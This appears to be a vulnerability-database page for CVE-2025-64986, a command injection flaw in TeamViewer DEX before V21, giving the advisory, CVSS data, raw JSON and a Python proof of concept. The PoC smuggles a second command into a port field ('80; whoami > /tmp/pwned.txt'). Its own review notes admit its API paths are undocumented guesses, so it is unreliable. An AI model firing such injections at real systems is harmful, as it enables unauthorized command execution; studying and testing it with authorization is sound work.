Security Vulnerability Report
CVE-2025-64986 CVSS 7.2 HIGH

CVE-2025-64986

Published: 2025-12-11 12:16:25
Last Modified: 2026-01-14 20:00:21

Description

A command injection vulnerability was discovered in TeamViewer DEX (formerly 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior to V21. Improper input validation allows authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:* - VULNERABLE
TeamViewer DEX (1E DEX) < V21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
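#!/usr/bin/env python3
"""
CVE-2025-64986 PoC - TeamViewer DEX Command Injection
Note: This PoC is for educational and authorized testing purposes only.

Flow: ask the target for its reported version and, only when that version
is below V21, send one test request for the DevicesListeningOnAPort
instruction.

NOTE(review): the /version and /execute paths, the X-CVE-ID header and the
response fields inspected below are not documented anywhere on this page;
confirm them against the product's API before trusting either result. The
comparison against V21 is the only check here that maps directly onto the
advisory text.
"""
import requests
import json
import sys

# Configuration
TARGET_URL = "https://target-server/api/v1"
API_KEY = "your_auth_token_here"
CVE_ID = "CVE-2025-64986"


def test_vulnerability():
    """
    Test for command injection in DevicesListeningOnAPort instruction
    This checks if proper input validation is in place

    Reads the module-level TARGET_URL and API_KEY.

    Returns:
        True when the response is HTTP 200 and its body matches the
        heuristic below; False otherwise, including on request errors.
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json",
        "X-CVE-ID": CVE_ID,
    }

    # Malicious payload attempting command injection
    # This payload tries to inject a command via improper input validation
    # NOTE(review): this is not a read-only probe. If the value is passed
    # through unvalidated, the appended command has a side effect (a file
    # write); the version check is the non-intrusive signal.
    payload = {
        "instruction": "1E-Explorer-TachyonCore-DevicesListeningOnAPort",
        "parameters": {
            "port": "80; whoami > /tmp/pwned.txt",
            "device_id": "test_device_001",
        },
    }

    try:
        response = requests.post(
            f"{TARGET_URL}/execute",
            headers=headers,
            json=payload,
            timeout=30,
        )

        # Check if command was executed (vulnerable)
        if response.status_code == 200:
            result = response.json()
            # NOTE(review): weak heuristic. Any 200 body containing the text
            # "output" is reported as vulnerable, so a positive here is an
            # indicator to investigate, not confirmation.
            if "command_executed" in result or "output" in str(result):
                print(f"[+] VULNERABLE: {CVE_ID}")
                print(f"[+] Command injection successful")
                return True

        print(f"[-] Not vulnerable or connection failed")
        return False

    except (requests.exceptions.RequestException, ValueError) as e:
        # ValueError covers a 200 response whose body is not valid JSON,
        # which would otherwise escape as an unhandled traceback.
        print(f"[-] Error: {e}")
        return False


def check_version(target_url, api_key):
    """
    Check if target is running affected version (prior to V21)

    Args:
        target_url: Base URL of the API; "/version" is appended to it.
        api_key: Bearer token sent in the Authorization header.

    Returns:
        True if the reported major version is below 21, False if it is 21
        or later, and None when the version could not be determined.
    """
    headers = {"Authorization": f"Bearer {api_key}"}

    try:
        response = requests.get(
            f"{target_url}/version",
            headers=headers,
            timeout=10,
        )
        version_info = response.json()
        version = version_info.get("version", "")

        # A missing or empty version used to be coerced to major version 0
        # and reported as VULNERABLE; treat it as "unknown" instead so an
        # error body or unexpected schema does not produce a false finding.
        if not version:
            raise ValueError("no version field in response")

        # Extract major version number
        major_version = int(version.split(".")[0])
    except (
        requests.exceptions.RequestException,
        ValueError,
        AttributeError,
        TypeError,
    ) as e:
        print(f"[-] Could not determine version: {e}")
        return None

    if major_version < 21:
        print(f"[!] Target version {version} is VULNERABLE (prior to V21)")
        return True

    print(f"[*] Target version {version} is patched (V21 or later)")
    return False


if __name__ == "__main__":
    print(f"[*] {CVE_ID} Command Injection Test")
    print("=" * 50)

    # NOTE: a token passed as argv[2] is visible in process listings and
    # shell history on the machine running this script.
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    if len(sys.argv) > 2:
        API_KEY = sys.argv[2]

    # First check version
    is_affected = check_version(TARGET_URL, API_KEY)

    if is_affected is None:
        # Previously an undetermined version fell into the "patched" branch,
        # which could lead an operator to close out an unverified asset.
        print("[!] Version check inconclusive; target is NOT confirmed patched")
    elif is_affected:
        print("\n[*] Attempting vulnerability test...")
        test_vulnerability()
    else:
        print("[*] Target appears to be patched, skipping exploitation test")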

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64986", "sourceIdentifier": "[email protected]", "published": "2025-12-11T12:16:25.400", "lastModified": "2026-01-14T20:00:20.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability was discovered in TeamViewer DEX (former 1E DEX), specifically within the 1E-Explorer-TachyonCore-DevicesListeningOnAPort instruction prior V21. Improper input validation, allowing authenticated attackers with Actioner privileges to inject arbitrary commands. Exploitation enables remote execution of elevated commands on devices connected to the platform."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teamviewer:digital_employee_experience:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.0", "matchCriteriaId": "86C851A4-69F1-4E48-994B-545A2092E502"}]}]}], "references": [{"url": "https://www.teamviewer.com/en/resources/trust-center/security-bulletins/tv-2025-1006/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}